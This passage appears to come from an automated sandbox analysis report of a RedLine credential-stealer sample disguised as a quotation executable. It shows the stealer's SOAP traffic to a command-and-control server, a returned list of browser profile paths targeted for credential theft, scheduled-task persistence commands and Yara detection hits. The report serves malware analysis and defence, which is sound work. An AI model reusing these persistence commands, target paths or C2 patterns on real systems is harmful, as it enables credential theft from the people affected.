5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.549915185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:44:33.402445078 CEST14283OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105829
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:44:33.425847054 CEST14283INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:33.722379923 CEST15405INHTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:33 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.549917185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:44:33.749598026 CEST15406OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105821
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:44:33.773118973 CEST15406INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:34.003176928 CEST16503INHTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:33 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.549918185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:44:38.557275057 CEST16504OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:44:38.580869913 CEST16504INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:38.605325937 CEST16505INHTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:38 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Jun 16, 2022 14:44:43.686079979 CEST16505OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:44:43.709475040 CEST16505INHTTP/1.1 100 Continue


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:14:42:25
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\Desktop\QUOTATION 061622.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QUOTATION 061622.exe"
                                                        Imagebase:0xb70000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Target ID:5
                                                        Start time:14:42:49
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Imagebase:0x11e0000
                                                        File size:2688096 bytes
                                                        MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.471969251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.572983809.00000000076CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.472524358.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.471695644.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000000.472226173.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.570961285.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Target ID:7
                                                        Start time:14:42:51
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:8
                                                        Start time:14:42:51
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:9
                                                        Start time:14:42:52
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:10
                                                        Start time:14:42:52
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:11
                                                        Start time:14:42:53
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x960000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:12
                                                        Start time:14:42:54
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Target ID:14
                                                        Start time:14:43:01
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0xf80000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.582345521.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 49%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Target ID:21
                                                        Start time:14:43:32
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Imagebase:0x11e0000
                                                        File size:2688096 bytes
                                                        MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.692582557.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565956315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565186728.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.565637349.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.696919861.0000000006E6F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000000.566287546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Target ID:22
                                                        Start time:14:43:35
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:23
                                                        Start time:14:43:35
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:24
                                                        Start time:14:43:36
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0x1100000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:25
                                                        Start time:14:43:37
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:26
                                                        Start time:14:43:37
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                                                        Imagebase:0x960000
                                                        File size:185856 bytes
                                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:27
                                                        Start time:14:43:38
                                                        Start date:16/06/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff77f440000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:31
                                                        Start time:14:44:01
                                                        Start date:16/06/2022
                                                        Path:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\Data\Data.exe
                                                        Imagebase:0xf80000
                                                        File size:373760 bytes
                                                        MD5 hash:C2C0094C2E70379101D9704808838355
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.695577674.000000000393A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                        Disassembly

                                                        Reset < >